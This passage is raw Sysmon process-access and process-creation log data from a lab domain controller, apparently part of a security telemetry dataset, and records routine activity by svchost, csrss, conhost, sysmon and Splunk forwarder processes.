10341000x80000000000000003007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E83-6005-8700-00000000A301}4328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-8E83-6005-8700-00000000A301}4328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9A-6005-8B00-00000000A301}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E9A-6005-8B00-00000000A301}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9A-6005-8B00-00000000A301}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E9A-6005-8B00-00000000A301}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.762{59A5CD1D-8E9B-6005-8C00-00000000A301}48004796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9B-6005-8C00-00000000A301}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 